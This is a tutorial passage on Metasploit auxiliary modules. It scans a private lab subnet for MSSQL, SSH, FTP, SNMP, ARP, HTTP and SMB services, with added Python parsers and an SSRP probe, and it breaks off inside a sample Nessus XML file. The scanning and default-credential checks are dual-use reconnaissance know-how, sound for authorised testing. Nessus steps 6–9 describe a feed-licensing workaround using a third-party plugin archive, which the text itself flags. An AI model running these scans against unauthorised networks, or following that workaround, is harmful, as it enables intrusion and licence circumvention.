Software Penetration Testing Based on Metasploit (3)


Using auxiliary modules

Auxiliary modules

List the module directory
# cd /usr/share/metasploit-framework/modules/auxiliary
# ll
total 108
drwxr-xr-x 47 root root  4096 Jun 24 17:25 admin
drwxr-xr-x  2 root root  4096 Jun 24 20:36 analyze
drwxr-xr-x  2 root root  4096 Jun 24 20:36 bnat
drwxr-xr-x  8 root root  4096 Jun 24 17:25 client
drwxr-xr-x  4 root root  4096 Jun 24 17:25 cloud
drwxr-xr-x  2 root root  4096 Jun 24 20:36 crawler
drwxr-xr-x  2 root root  4096 Jun 24 20:36 docx
drwxr-xr-x 27 root root  4096 Jun 24 17:25 dos
-rwxr-xr-x  1 root root  1473 Jun 16 23:59 example.py
-rw-r--r--  1 root root  1708 Jun 16 23:59 example.rb
drwxr-xr-x  2 root root  4096 Jun 24 20:36 fileformat
drwxr-xr-x 10 root root  4096 Jun 24 17:25 fuzzers
drwxr-xr-x  2 root root 24576 Jun 24 20:36 gather
drwxr-xr-x  2 root root  4096 Jun 24 20:36 parser
drwxr-xr-x  3 root root  4096 Jun 24 17:25 pdf
drwxr-xr-x 87 root root  4096 Jun 24 17:25 scanner
drwxr-xr-x  4 root root  4096 Jun 24 20:36 server
drwxr-xr-x  2 root root  4096 Jun 24 20:36 sniffer
drwxr-xr-x  9 root root  4096 Jun 24 17:25 spoof
drwxr-xr-x  5 root root  4096 Jun 24 17:25 sqli
drwxr-xr-x  2 root root  4096 Jun 24 20:36 voip
drwxr-xr-x  5 root root  4096 Jun 24 17:25 vsploit


List the modules
msf6 > show auxiliary

Auxiliary
=========

   #   Name                                                        Disclosure Date  Rank    Check  Description
   -   ----                                                        ---------------  ----    -----  -----------
   0   auxiliary/admin/2wire/xslt_password_reset                   2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability
   1   auxiliary/admin/android/google_play_store_uxss_xframe_rce                    normal  No     Android Browser RCE Through Google Play Store XFO
   2   auxiliary/admin/appletv/appletv_display_image                                normal  No     Apple TV Image Remote Control
   3   auxiliary/admin/appletv/appletv_display_video                                normal  No     Apple TV Video Remote Control
   4   auxiliary/admin/atg/atg_client                                               normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   5   auxiliary/admin/aws/aws_launch_instances                                     normal  No     Launches Hosts in AWS
   6   auxiliary/admin/backupexec/dump                                              normal  No     Veritas Backup Exec Windows Remote File Access
   7   auxiliary/admin/backupexec/registry                                          normal  No     Veritas Backup Exec Server Registry Access
   8   auxiliary/admin/chromecast/chromecast_reset                                  normal  No     Chromecast Factory Reset DoS
   9   auxiliary/admin/chromecast/chromecast_youtube                                normal  No     Chromecast YouTube Remote Control
   10  auxiliary/admin/db2/db2rcmd                                 2004-03-04       normal  No     IBM DB2 db2rcmd.exe Command Execution Vulnerability
   11  auxiliary/admin/dcerpc/cve_2020_1472_zerologon                               normal  Yes    Netlogon Weak Cryptographic Authentication


Using an auxiliary module


msf6 > use auxiliary/scanner/http/webdav_scanner


Example: finding exposed SQL Server instances
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping
msf6 auxiliary(scanner/mssql/mssql_ping) > options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/mssql/mssql_ping) > run

[*] 192.168.0.106:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nothing was found on this host. mssql_ping asks the SQL Browser service over UDP 1434, so a stopped Browser service or a host firewall that drops UDP leaves the scan empty even when SQL Server itself is listening on TCP 1433; a direct TCP check of 1433 is the fallback.
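What mssql_ping actually sends and receives is worth seeing once, because it explains both the empty result above and why the module needs no credentials. The following is an added example, not code from the article: it implements the SQL Server Resolution Protocol (SSRP) exchange the module relies on, a one-byte request to UDP 1434 and a parser for the instance list that comes back. The sample reply at the bottom is constructed (the host name is taken from the SMB scan later on this page, the version and pipe path are made up) so the parser can run offline; ping() does the live probe.

```python
# Added example, not code from the original article: the SQL Server Resolution
# Protocol (SSRP, MS-SQLR) exchange that auxiliary/scanner/mssql/mssql_ping
# performs. The SQL Browser service listens on UDP 1434; a one-byte
# CLNT_UCAST_EX request (0x02) makes it enumerate every instance on the host.
import socket
import struct

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x02"   # "list all instances"; no authentication involved
SVR_RESP = 0x05           # message type of the reply


def build_probe() -> bytes:
    """The entire request datagram is a single byte."""
    return CLNT_UCAST_EX


def parse_response(data: bytes) -> list:
    """Parse an SVR_RESP datagram into one dict per instance.

    Layout: 0x05 | RESP_SIZE (uint16, little-endian) | RESP_DATA (ASCII)
    RESP_DATA is 'key;value;key;value;...' with instances separated by ';;'.
    """
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP message")
    (size,) = struct.unpack_from("<H", data, 1)
    if len(data) - 3 < size:
        raise ValueError("truncated SSRP response")
    body = data[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for chunk in body.split(";;"):
        if not chunk:
            continue
        fields = chunk.split(";")
        # e.g. ServerName;HOST;InstanceName;SQLEXPRESS;IsClustered;No;Version;15.0.2000.5;tcp;1433
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def ping(host: str, timeout: float = 2.0) -> list:
    """Live probe of one host (what the module does for each RHOST)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_probe(), (host, SSRP_PORT))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return []          # no SQL Browser answered: stopped, filtered, or absent
    return parse_response(data)


# Constructed sample reply (not captured from the lab host) so the parser can
# be exercised offline: one default instance on TCP 1433 and one named
# instance reachable only over a named pipe.
_SAMPLE_BODY = (
    b"ServerName;DESKTOP-9A8VFKB;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;15.0.2000.5;tcp;1433;;"
    b"ServerName;DESKTOP-9A8VFKB;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;15.0.2000.5;np;\\\\DESKTOP-9A8VFKB\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_RESPONSE = bytes([SVR_RESP]) + struct.pack("<H", len(_SAMPLE_BODY)) + _SAMPLE_BODY


if __name__ == "__main__":
    for inst in parse_response(SAMPLE_RESPONSE):
        print(f"{inst['ServerName']}\\{inst['InstanceName']} "
              f"version {inst['Version']} tcp={inst.get('tcp', '-')}")
```

An empty list from ping() means no SQL Browser answered, not that no SQL Server exists; a named instance that only exposes a named pipe, as the second sample entry does, also never shows a TCP port in this reply.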


Protocol scanning

SSH scan
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ssh/ssh_version) > run
[*] 192.168.0.1/24:22 - Scanned  41 of 256 hosts (16% complete)
[*] 192.168.0.1/24:22 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.1/24:22 - Scanned  82 of 256 hosts (32% complete)
[+] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)
[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)
[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)
[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


FTP scan
msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ftp/ftp_version) > run
[*] 192.168.0.1/24:21     - Scanned  45 of 256 hosts (17% complete)
[*] 192.168.0.1/24:21     - Scanned  55 of 256 hosts (21% complete)
[*] 192.168.0.1/24:21     - Scanned  99 of 256 hosts (38% complete)
[+] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[+] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 144 of 256 hosts (56% complete)
[*] 192.168.0.1/24:21     - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.0.1/24:21     - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:21     - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.0.1/24:21     - Scanned 253 of 256 hosts (98% complete)
[*] 192.168.0.1/24:21     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous 
msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.0.161:21      - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.0.161:21      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Conclusion: the FTP service on 192.168.0.161 allows anonymous login with read access.


SNMP scan
msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50
threads => 50
msf6 auxiliary(scanner/snmp/snmp_login) > run
[*] Scanned  50 of 256 hosts (19% complete)
[*] Scanned  54 of 256 hosts (21% complete)
[*] Scanned 100 of 256 hosts (39% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 181 of 256 hosts (70% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

snmp_login tries the framework's default community-string wordlist against UDP 161; no host on the subnet accepted any of them in this run, which is why there are no [+] lines.


ARP sweep

arp_sweep sends ARP requests, so it needs raw-socket (root or CAP_NET_RAW) privileges and only finds hosts on the scanner's own layer-2 segment; the SHOST and SMAC options let you choose the source the requests appear to come from.
msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > options
Module options (auxiliary/scanner/discovery/arp_sweep):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.106 appears to be up (UNKNOWN).
[+] 192.168.0.150 appears to be up (VMware, Inc.).
[+] 192.168.0.151 appears to be up (UNKNOWN).
[+] 192.168.0.152 appears to be up (UNKNOWN).
[+] 192.168.0.158 appears to be up (UNKNOWN).
[+] 192.168.0.159 appears to be up (UNKNOWN).
[+] 192.168.0.161 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
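The "(VMware, Inc.)" versus "(UNKNOWN)" tags above come from matching the first three bytes of the replying MAC against the IEEE OUI list. The following is an added example, not code from the article: it builds the broadcast ARP request arp_sweep sends and parses the replies into the same "appears to be up" lines. The OUI table holds only three VMware prefixes as a stand-in for the full list, and the reply frames at the bottom are constructed with made-up MAC addresses; the addresses reuse the lab subnet from the page.

```python
# Added example, not code from the original article: the raw frames behind
# auxiliary/scanner/discovery/arp_sweep, built and parsed with struct only.
# OUI_VENDORS is a three-entry stand-in for the IEEE list the module uses to
# print "(VMware, Inc.)"; every other prefix prints as UNKNOWN, as above.
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
OUI_VENDORS = {"00:0c:29": "VMware, Inc.", "00:50:56": "VMware, Inc.", "00:05:69": "VMware, Inc."}


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def _frame(dst_mac, src_mac, op, sha, spa, tha, tpa) -> bytes:
    """Ethernet II header + 28-byte ARP body (htype=Ethernet, ptype=IPv4)."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + mac_bytes(sha) + ip_bytes(spa) + mac_bytes(tha) + ip_bytes(tpa))
    return eth + arp


def build_request(smac: str, sip: str, target_ip: str) -> bytes:
    """'Who has target_ip? Tell sip', sent to the broadcast MAC (the SMAC/SHOST options)."""
    return _frame("ff:ff:ff:ff:ff:ff", smac, ARP_REQUEST, smac, sip, "00:00:00:00:00:00", target_ip)


def build_reply(smac: str, sip: str, to_mac: str, to_ip: str) -> bytes:
    """What a live host answers with; used here only to construct sample input."""
    return _frame(to_mac, smac, ARP_REPLY, smac, sip, to_mac, to_ip)


def parse_reply(frame: bytes):
    """Return (ip, mac, vendor) for an ARP reply, or None for anything else."""
    if len(frame) < 42 or struct.unpack_from("!H", frame, 12)[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen, op) != (1, 0x0800, 6, 4, ARP_REPLY):
        return None
    mac = mac_str(frame[22:28])        # sender hardware address
    ip = ip_str(frame[28:32])          # sender protocol address
    return ip, mac, OUI_VENDORS.get(mac[:8], "UNKNOWN")


def report(frames) -> list:
    """Format replies the way arp_sweep prints them, one line per address."""
    seen = {}
    for frame in frames:
        parsed = parse_reply(frame)
        if parsed:
            seen[parsed[0]] = parsed
    return [f"{ip} appears to be up ({vendor})."
            for ip, _, vendor in sorted(seen.values(), key=lambda t: ip_bytes(t[0]))]


# Constructed frames standing in for what a packet capture on the scanning
# interface would hand back; the MAC addresses are made up.
SAMPLE_FRAMES = [
    build_reply("00:0c:29:aa:bb:cc", "192.168.0.150", "08:00:27:11:22:33", "192.168.0.105"),
    build_reply("10:20:30:40:50:60", "192.168.0.1", "08:00:27:11:22:33", "192.168.0.105"),
    build_request("08:00:27:11:22:33", "192.168.0.105", "192.168.0.2"),   # our own probe, ignored
]

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_FRAMES)))
```

Putting build_request() on the wire takes an AF_PACKET socket bound to the interface and CAP_NET_RAW, which is the privilege arp_sweep needs as well; because ARP never crosses a router, anything beyond the local broadcast domain has to be found with the TCP- or ICMP-based discovery modules instead.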


HTTP service scan
msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/http/http_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.0.1:80
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  55 of 256 hosts (21% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0
[*] Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 175 of 256 hosts (68% complete)
[*] Scanned 187 of 256 hosts (73% complete)
[*] Scanned 209 of 256 hosts (81% complete)
[*] Scanned 235 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


SMB scan

SMB (Server Message Block) is the file- and printer-sharing protocol that Microsoft and Intel published in 1987 as the communication protocol for Microsoft networks. It spans the session and presentation layers and a small part of the application layer.


SMB uses the NetBIOS application programming interface (API). It is an open protocol that permits extensions, which has made it large and complex: roughly 65 top-level operations, each with more than 120 functions, not all of which even Windows NT implements. Microsoft later rebranded SMB as CIFS (Common Internet File System) and added many new features.


SMB was originally designed by Barry Feigenbaum at IBM to turn the DOS local file-access interface (INT 21h) into a network file system; today it is used for communication between clients and servers on a network.


msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)
[*] 192.168.0.1/24:       - Scanned  60 of 256 hosts (23% complete)
[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)
[*] 192.168.0.106:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)
[*] 192.168.0.1/24:       - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.0.1/24:       - Scanned 107 of 256 hosts (41% complete)
[*] 192.168.0.1/24:       - Scanned 159 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 161 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:       - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.0.1/24:       - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Two details in this output matter for the later steps: 192.168.0.158 and 192.168.0.161 still negotiate SMB version 1, and every host reports signatures:optional, so SMB signing is not enforced anywhere on the subnet.
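The SSH, FTP, HTTP and SMB scanner output above is easier to act on as one table. The following is an added example, not code from the article: it parses those exact lines (copied from the transcripts above) into a service inventory and flags the two SMB weaknesses the smb_version run exposes, SMBv1 still negotiable and signing optional. The parsing rules are mine and cover only the four output formats shown; they are not part of Metasploit.

```python
# Added example, not code from the original article: turning the version
# scanner lines above into a service inventory. The sample lines are copied
# from the scans on this page; the regexes are mine and cover only
# ssh_version, ftp_version, http_version and smb_version output.
import re
from collections import Counter

SAMPLE_OUTPUT = r"""
[+] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[+] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[+] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[+] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[+] 192.168.0.1:80
[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0
[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)
"""

LINE = re.compile(r"^\[[+*]\] (?P<host>\d+\.\d+\.\d+\.\d+):(?P<port>\d+)\s*(?P<rest>.*)$")
FTP_BANNER = re.compile(r"FTP Banner: '(?P<banner>.*)'")
SMB_DETECTED = re.compile(r"SMB Detected \(versions:(?P<versions>[^)]*)\).*\(signatures:(?P<sig>[^)]+)\)")


def parse_line(line: str):
    """One scanner line -> inventory record, or None for progress/summary lines."""
    m = LINE.match(line)
    if not m:
        return None
    host, port = m["host"], int(m["port"])
    rest = m["rest"].lstrip("- ").strip()
    if port == 22 and rest.startswith("SSH server version:"):
        product = re.search(r"service\.product=(\S+)", rest)
        version = re.search(r"service\.version=(\S+)", rest)
        name = f"{product[1]} {version[1]}" if product and version else rest.split()[3]
        return {"host": host, "port": port, "service": "ssh", "product": name, "flags": []}
    if port == 21 and (f := FTP_BANNER.search(rest)):
        first = f["banner"].split(r"\x0d\x0a")[0]     # first 220 line carries the product
        name = re.sub(r"^220[- ]", "", first).strip("()")
        return {"host": host, "port": port, "service": "ftp", "product": name, "flags": ["cleartext-ftp"]}
    if port == 445 and (s := SMB_DETECTED.search(rest)):
        versions = [v.strip() for v in s["versions"].split(",") if v.strip()]
        flags = []
        if "1" in versions:
            flags.append("smb1-enabled")               # SMBv1 still negotiable
        if s["sig"] == "optional":
            flags.append("smb-signing-optional")       # relay / man-in-the-middle exposure
        return {"host": host, "port": port, "service": "smb",
                "product": "SMB " + "/".join(versions), "flags": flags}
    if port == 80:
        return {"host": host, "port": port, "service": "http", "product": rest or "unknown", "flags": []}
    return None


def inventory(text: str) -> list:
    return [rec for rec in map(parse_line, text.splitlines()) if rec]


def flag_summary(records) -> Counter:
    return Counter(flag for rec in records for flag in rec["flags"])


if __name__ == "__main__":
    recs = inventory(SAMPLE_OUTPUT)
    for r in recs:
        print(f"{r['host']:<15} {r['port']:<4} {r['service']:<5} {r['product']:<45} {' '.join(r['flags'])}")
    print(dict(flag_summary(recs)))
```

The empty Server header on 192.168.0.1:80 is recorded as "unknown" rather than dropped, so the host still appears in the inventory; a product string such as "vsFTPd 2.3.4" or "Apache/2.2.8" is exactly what you feed into the search command later on this page.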


Vulnerability scanning

Nexpose

# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin
# chmod a+x NeXposeSetup-Linux64.bin
# ./NeXposeSetup-Linux64.bin
# cd /opt/rapid7/nexpose/nsc
# ./nsc


Once the login page at https://127.0.0.1:3780/ loads, the console is up.


Nessus

Reference (Chinese): https://blog.csdn.net/qq_51577576/article/details/123211031

1) Download the package from https://www.tenable.com/downloads/nessus

2) Install it:
# dpkg -i Nessus-10.2.0-debian9_amd64.deb

3) Start the service:
# systemctl start nessusd.service

4) Open https://127.0.0.1:8834/ and finish the setup wizard.

5) Stop the service:
# systemctl stop nessusd.service

6) Edit the plugin feed metadata:
# gedit /opt/nessus/var/nessus/plugin_feed_info.inc

7) Set the following content:
PLUGIN_SET = "202201250216";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";

8) Create the plugins directory and copy the file into it:
# cd /opt/nessus/var/nessus/
# mkdir plugins
# cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/

9) Load the plugin archive offline (the author shares one at https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u):
# /opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gz

Steps 6 to 9 only make nessuscli accept a plugin archive obtained elsewhere; they do not license the feed. With a valid activation code the supported route is /opt/nessus/sbin/nessuscli fetch --register <code> followed by /opt/nessus/sbin/nessuscli update --all, and a plugin archive downloaded from an unknown third party is itself untrusted code that runs with the scanner's privileges.

Import the Nessus results into the Metasploit database:
msf6 > db_connect postgres:123456@127.0.0.1/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 > db_status
[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.
msf6 > db_import /home/jerry/jerry_01sqgv.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.0.158
[*] Importing host 192.168.0.157
[*] Importing host 192.168.0.151
[*] Importing host 192.168.0.150
[*] Importing host 192.168.0.106
[*] Importing host 192.168.0.1
[*] Successfully imported /home/jerry/jerry_01sqgv.nessus
msf6 > hosts -c address,svcs,vulns

Hosts
=====

address        svcs  vulns
-------        ----  -----
192.168.0.1    2     14
192.168.0.106  23    76
192.168.0.150  6     46
192.168.0.151  4     28
192.168.0.155  3     2
192.168.0.157  4     29
192.168.0.158  10    37


address: IP address

svcs: number of services detected on the host

vulns: number of findings imported from Nessus. Every plugin result is imported, informational ones included, so 76 on 192.168.0.106 is not 76 exploitable holes; check the severity in the vulns output before choosing targets.
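To see where the svcs and vulns columns come from, it helps to walk a .nessus file the way db_import does. The following is an added example, not code from the article or from Metasploit: it reads a constructed Nessus v2 export (placeholder plugin IDs and names, no real plugins; the two addresses are from the lab subnet above) and produces the same per-host counts, with the severity split that the hosts command does not show. The counting rules assumed here, one service per distinct port/protocol with a non-zero port and one vuln per ReportItem that carries a plugin ID, mirror the Metasploit importer's behaviour as I understand it.

```python
# Added example, not code from the original article or from Metasploit: what
# db_import does with a Nessus v2 export and where the svcs/vulns columns of
# `hosts -c address,svcs,vulns` come from. The XML is constructed; plugin IDs
# and names are placeholders, not real Nessus plugins.
import xml.etree.ElementTree as ET
from collections import Counter

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="lab scan">
    <ReportHost name="192.168.0.158">
      <HostProperties>
        <tag name="operating-system">Microsoft Windows 7 Home Basic Service Pack 1</tag>
      </HostProperties>
      <ReportItem port="0"    svc_name="general" protocol="tcp" severity="0" pluginID="900001" pluginName="Placeholder: host information"/>
      <ReportItem port="445"  svc_name="cifs"    protocol="tcp" severity="0" pluginID="900002" pluginName="Placeholder: service detection"/>
      <ReportItem port="445"  svc_name="cifs"    protocol="tcp" severity="4" pluginID="900003" pluginName="Placeholder: critical-severity finding"/>
      <ReportItem port="3389" svc_name="msrdp"   protocol="tcp" severity="2" pluginID="900004" pluginName="Placeholder: medium-severity finding"/>
    </ReportHost>
    <ReportHost name="192.168.0.161">
      <ReportItem port="21"   svc_name="ftp"     protocol="tcp" severity="0" pluginID="900005" pluginName="Placeholder: banner"/>
      <ReportItem port="21"   svc_name="ftp"     protocol="tcp" severity="4" pluginID="900006" pluginName="Placeholder: critical-severity finding"/>
      <ReportItem port="445"  svc_name="cifs"    protocol="tcp" severity="3" pluginID="900007" pluginName="Placeholder: high-severity finding"/>
    </ReportHost>
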